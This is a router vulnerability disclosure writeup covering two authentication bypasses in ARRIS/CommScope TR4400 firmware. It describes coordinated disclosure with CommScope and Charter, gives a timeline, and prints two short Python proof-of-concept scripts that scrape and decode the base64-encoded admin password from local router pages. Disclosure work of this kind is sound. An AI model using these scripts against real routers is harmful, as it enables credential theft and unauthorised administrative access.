CommScope Vulnerability — Authentication Bypass in ARRIS TR4400 Firmware Version A1.00.004–180301
— — — — — — — — — — — — — — — — — — — — — — — — — —
UPDATE SEPTEMBER 5th 2019 — CVE’s acquired!
— — — — — — — — — — — — — — — — — — — — — — — — — —
It’s worth mentioning that although ARRIS was the original manufacturer of this router, ARRIS was acquired by CommScope. To keep things simple, I’ll refer to the company as CommScope for this writeup.
During late April 2019 I discovered two authentication bypasses to the administrative interface in my home router. I decided to take this opportunity to participate in a coordinated disclosure with CommScope as I didn’t want to drop the exploit code online and submit for a CVEs. I reached out to CommScope via their “Product Security Issue or Vulnerability” portal (KUDOS to companies who have product security portals) and they were able to successfully reproduce the issue and quickly began working on a firmware update. Then, CommScope passed off the updated firmware to Charter (Spectrum) to deliver a nationwide out-of-band patch around August 20th, 2019. Working through CommScope, Charter patched my device first so I could confirm the fix. Then, Charter deployed the nationwide out-of-band patch.
All-in-all, working with CommScope and Charter was a delightful experience. It was clear that both companies care about the security of their products and were very attentive of the issue. CommScope updated me constantly on the status on the firmware build, the next steps they were taking, when to expect the patch, etc. There was always plenty of communication.
The only piece of advice I’d like to give to anyone else trying to get CVEs from their ISP’s customer-provided equipment (CPE) is: There are a lot of moving parts. I found the bugs in CommScope’s hardware however Charter is ultimately responsible to deliver the patch to customers. One should expect a somewhat lengthier remediation timeline as two companies (manufacturer and ISP) need to work in tandem to deliver the patch to customers.
OK, now for the technical stuff (which won’t take long). Bypassing authentication in ARRIS TR4400 was rather trivial as they commit the current base64 encoded passwords on two web pages accessible from any user connected to the Wi-Fi. The two pages are http://192.168.1.1/basic_sett.html and http://192.168.1.1/login.html. I’ve written two tiny proof of concepts that simply grabs the password and decodes it.
PoC One — basic_sett.html
import requests,sys
import base64
from bs4 import BeautifulSoup
def get_current_password():
r = requests.get(‘http://192.168.1.1/basic_sett.html')
soup = BeautifulSoup(r.content, ‘html.parser’)
inputTag = soup.findAll(attrs={“name” : “cur_passwd”})
encoded = output = inputTag[0][‘value’]
decode = base64.b64decode(encoded)
print decode
get_current_password()
PoC two — login.html
import requests,sys
import base64
from bs4 import BeautifulSoup
def get_current_password():
r = requests.get(‘http://192.168.1.1/login.html')
soup = BeautifulSoup(r.content, ‘html.parser’)
inputTag = soup.findAll(attrs={“name” : “cur_passwd”})
encoded = output = inputTag[0][‘value’]
decode = base64.b64decode(encoded)
print decode
get_current_password()
Disclosure timeline:
April 26th, 2019 Initial report submitted
April 30th, 2019 Second attempt to contact
April 30th, 2019 Contact made from CommScope: They are looking into it.
June 10th, 2019 CommScope successfully reproduced the issue and a patch is underway.
July 19th, 2019 Charter sets target date for firmware deployment for mid-August
August 15th, 2019 Charter pushes the patch to my router.
August 19th, 2019 I confirmed the issue was fixed.
August 22nd, 2019 Coordinated/Responsible disclosure. Writeup release date.
